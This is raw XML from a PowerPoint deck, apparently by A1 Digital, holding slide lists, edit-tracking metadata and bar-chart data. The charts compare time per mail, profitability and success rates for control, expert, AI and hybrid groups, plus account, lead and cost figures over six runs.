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7" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId38"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId39"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="314" r:id="rId6"/>
    <p:sldId id="333" r:id="rId7"/>
    <p:sldId id="335" r:id="rId8"/>
    <p:sldId id="1721" r:id="rId9"/>
    <p:sldId id="1722" r:id="rId10"/>
    <p:sldId id="336" r:id="rId11"/>
    <p:sldId id="321" r:id="rId12"/>
    <p:sldId id="327" r:id="rId13"/>
    <p:sldId id="1723" r:id="rId14"/>
    <p:sldId id="1720" r:id="rId15"/>
    <p:sldId id="1724" r:id="rId16"/>
    <p:sldId id="296" r:id="rId17"/>
    <p:sldId id="1732" r:id="rId18"/>
    <p:sldId id="1731" r:id="rId19"/>
    <p:sldId id="1725" r:id="rId20"/>
    <p:sldId id="1744" r:id="rId21"/>
    <p:sldId id="1733" r:id="rId22"/>
    <p:sldId id="1737" r:id="rId23"/>
    <p:sldId id="1738" r:id="rId24"/>
    <p:sldId id="1740" r:id="rId25"/>
    <p:sldId id="1739" r:id="rId26"/>
    <p:sldId id="1741" r:id="rId27"/>
    <p:sldId id="1742" r:id="rId28"/>
    <p:sldId id="1743" r:id="rId29"/>
    <p:sldId id="1745" r:id="rId30"/>
    <p:sldId id="1727" r:id="rId31"/>
    <p:sldId id="1735" r:id="rId32"/>
    <p:sldId id="359" r:id="rId33"/>
    <p:sldId id="1730" r:id="rId34"/>
    <p:sldId id="1736" r:id="rId35"/>
    <p:sldId id="1734" r:id="rId36"/>
    <p:sldId id="1726" r:id="rId37"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="A1 Sans" panose="00000500000000000000" pitchFamily="50" charset="0"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="A1 Serif" panose="00000500000000000000" pitchFamily="50" charset="0"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId44"/>
      <p:bold r:id="rId45"/>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1 Digital" id="{A4A19635-61B3-4CD5-BF85-8A1D10C8CAF4}">
          <p14:sldIdLst>
            <p14:sldId id="257"/>
            <p14:sldId id="314"/>
            <p14:sldId id="333"/>
            <p14:sldId id="335"/>
            <p14:sldId id="1721"/>
            <p14:sldId id="1722"/>
            <p14:sldId id="336"/>
            <p14:sldId id="321"/>
            <p14:sldId id="327"/>
            <p14:sldId id="1723"/>
            <p14:sldId id="1720"/>
            <p14:sldId id="1724"/>
            <p14:sldId id="296"/>
            <p14:sldId id="1732"/>
            <p14:sldId id="1731"/>
            <p14:sldId id="1725"/>
            <p14:sldId id="1744"/>
            <p14:sldId id="1733"/>
            <p14:sldId id="1737"/>
            <p14:sldId id="1738"/>
            <p14:sldId id="1740"/>
            <p14:sldId id="1739"/>
            <p14:sldId id="1741"/>
            <p14:sldId id="1742"/>
            <p14:sldId id="1743"/>
            <p14:sldId id="1745"/>
            <p14:sldId id="1727"/>
            <p14:sldId id="1735"/>
            <p14:sldId id="359"/>
            <p14:sldId id="1730"/>
            <p14:sldId id="1736"/>
            <p14:sldId id="1734"/>
            <p14:sldId id="172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6633"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="F2F2F2"/>
    <a:srgbClr val="007020"/>
    <a:srgbClr val="DA291C"/>
    <a:srgbClr val="333333"/>
    <a:srgbClr val="BFBFBF"/>
    <a:srgbClr val="E2564D"/>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D62C81-F9F2-B790-8C2A-20F9455C3379}" v="35" dt="2022-10-04T11:19:25.17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5905" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="150" d="100"/>
          <a:sy n="150" d="100"/>
        </p:scale>
        <p:origin x="3714" y="2268"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="3840"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="66" d="100"/>
        <a:sy n="66" d="100"/>
      </p:scale>
      <p:origin x="0" y="-1602"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="80" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="3918" y="84"/>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anovic Ljiljana" userId="S::ljiljana.marijanovic@a1.group::0c77e7ad-0817-48f5-9800-d22dfd42b76f" providerId="AD" clId="Web-{84D62C81-F9F2-B790-8C2A-20F9455C3379}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Marijanovic Ljiljana" userId="S::ljiljana.marijanovic@a1.group::0c77e7ad-0817-48f5-9800-d22dfd42b76f" providerId="AD" clId="Web-{84D62C81-F9F2-B790-8C2A-20F9455C3379}" dt="2022-10-04T11:19:25.174" v="33" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Marijanovic Ljiljana" userId="S::ljiljana.marijanovic@a1.group::0c77e7ad-0817-48f5-9800-d22dfd42b76f" providerId="AD" clId="Web-{84D62C81-F9F2-B790-8C2A-20F9455C3379}" dt="2022-10-04T11:19:25.174" v="33" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2400666275" sldId="292"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marijanovic Ljiljana" userId="S::ljiljana.marijanovic@a1.group::0c77e7ad-0817-48f5-9800-d22dfd42b76f" providerId="AD" clId="Web-{84D62C81-F9F2-B790-8C2A-20F9455C3379}" dt="2022-10-04T11:19:25.174" v="33" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2400666275" sldId="292"/>
            <ac:spMk id="3" creationId="{4C2312E5-FBE4-4993-9D54-394F9963CFEF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Marijanovic Ljiljana" userId="S::ljiljana.marijanovic@a1.group::0c77e7ad-0817-48f5-9800-d22dfd42b76f" providerId="AD" clId="Web-{84D62C81-F9F2-B790-8C2A-20F9455C3379}" dt="2022-10-04T11:17:14.405" v="30"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2400666275" sldId="292"/>
            <ac:spMk id="17" creationId="{0BFD9148-94B9-4BB3-AE05-50D29321A27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err="1"/>
              <a:t>Zeitaufwand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (min/Mail)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT"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AT"/>
        </a:p>
      </c:txPr>
    </c:title>
    <c:autoTitleDeleted val="0"/>
    <c:plotArea>
      <c:layout>
        <c:manualLayout>
          <c:layoutTarget val="inner"/>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="8.0620652887139113E-2"/>
          <c:y val="0.13432030562539371"/>
          <c:w val="0.86312934711286093"/>
          <c:h val="0.75601319108620524"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Kontrolle</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F2F2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Tabelle1!$B$2</c:f>
              <c:numCache>
                <c:formatCode>_-* #,##0_-;\-* #,##0_-;_-* "-"??_-;_-@_-</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>15</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-D577-4162-9659-234452B948FC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>ExpertIn</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="3333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Tabelle1!$C$2</c:f>
              <c:numCache>
                <c:formatCode>_-* #,##0_-;\-* #,##0_-;_-* "-"??_-;_-@_-</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>30</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-D577-4162-9659-234452B948FC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>AI</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="DA291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Tabelle1!$D$2</c:f>
              <c:numCache>
                <c:formatCode>_-* #,##0_-;\-* #,##0_-;_-* "-"??_-;_-@_-</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.54</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-D577-4162-9659-234452B948FC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$E$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Hybrid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Tabelle1!$E$2</c:f>
              <c:numCache>
                <c:formatCode>_-* #,##0.0_-;\-* #,##0.0_-;_-* "-"??_-;_-@_-</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>4.4000000000000004</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000003-D577-4162-9659-234452B948FC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="840089184"/>
        <c:axId val="840086888"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="840089184"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="840086888"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="84008688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089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err="1"/>
              <a:t>Profitabilität</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> ($/h)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT"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AT"/>
        </a:p>
      </c:txPr>
    </c:title>
    <c:autoTitleDeleted val="0"/>
    <c:plotArea>
      <c:layout>
        <c:manualLayout>
          <c:layoutTarget val="inner"/>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="8.0620652887139113E-2"/>
          <c:y val="0.13432030562539371"/>
          <c:w val="0.86312934711286093"/>
          <c:h val="0.75601319108620524"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Kontrolle</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F2F2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Tabelle1!$B$2</c:f>
              <c:numCache>
                <c:formatCode>_-* #,##0_-;\-* #,##0_-;_-* "-"??_-;_-@_-</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-F5D0-4B49-BE2C-3F8576E1F005}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>ExpertIn</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="3333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Tabelle1!$C$2</c:f>
              <c:numCache>
                <c:formatCode>_-* #,##0_-;\-* #,##0_-;_-* "-"??_-;_-@_-</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>6.1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-F5D0-4B49-BE2C-3F8576E1F005}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>AI</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="DA291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Tabelle1!$D$2</c:f>
              <c:numCache>
                <c:formatCode>_-* #,##0_-;\-* #,##0_-;_-* "-"??_-;_-@_-</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>338.6</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-F5D0-4B49-BE2C-3F8576E1F005}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$E$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Hybrid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Tabelle1!$E$2</c:f>
              <c:numCache>
                <c:formatCode>_-* #,##0.0_-;\-* #,##0.0_-;_-* "-"??_-;_-@_-</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>138</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000003-F5D0-4B49-BE2C-3F8576E1F005}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="840089184"/>
        <c:axId val="840086888"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="840089184"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="840086888"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="84008688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089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AT" dirty="0"/>
              <a:t>Erfolgsraten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620652887139113E-2"/>
          <c:y val="0.13432030562539371"/>
          <c:w val="0.86312934711286093"/>
          <c:h val="0.75601319108620524"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Kontrolle</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F2F2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Tabelle1!$B$2</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.12</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-EFB1-4F24-B6D3-D0CA568C211A}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>ExpertIn</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="3333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Tabelle1!$C$2</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.54</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-EFB1-4F24-B6D3-D0CA568C211A}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>AI</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="DA291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Tabelle1!$D$2</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.54</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-EFB1-4F24-B6D3-D0CA568C211A}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$E$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Hybrid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Tabelle1!$E$2</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.56000000000000005</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-48F8-49A0-9628-BDE53DDE6DDC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="840089184"/>
        <c:axId val="840086888"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="840089184"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="840086888"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="840086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089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Tabelle1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Accounts</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Tabelle1!$A$2:$A$7</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>Run 1</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Run 2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Run 3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Run 4</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Run 5</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Run 6</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Tabelle1!$B$2:$B$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-4CD3-4773-8BE1-5F78EE998934}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Leads</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Tabelle1!$A$2:$A$7</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>Run 1</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Run 2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Run 3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Run 4</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Run 5</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Run 6</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Tabelle1!$C$2:$C$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>6</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-4CD3-4773-8BE1-5F78EE998934}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:overlap val="100"/>
        <c:axId val="1924473679"/>
        <c:axId val="1924474159"/>
      </c:barChart>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="stacked"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Tabelle1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Kosten</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Tabelle1!$A$2:$A$7</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>Run 1</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Run 2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Run 3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Run 4</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Run 5</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Run 6</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Tabelle1!$D$2:$D$7</c:f>
              <c:numCache>
                <c:formatCode>_-[$$-409]* #,##0.00_ ;_-[$$-409]* \-#,##0.00\ ;_-[$$-409]* "-"??_ ;_-@_ </c:formatCode>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>18.3</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>9.3000000000000007</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>25.83</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>35.68</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>16.89</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>32.93</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
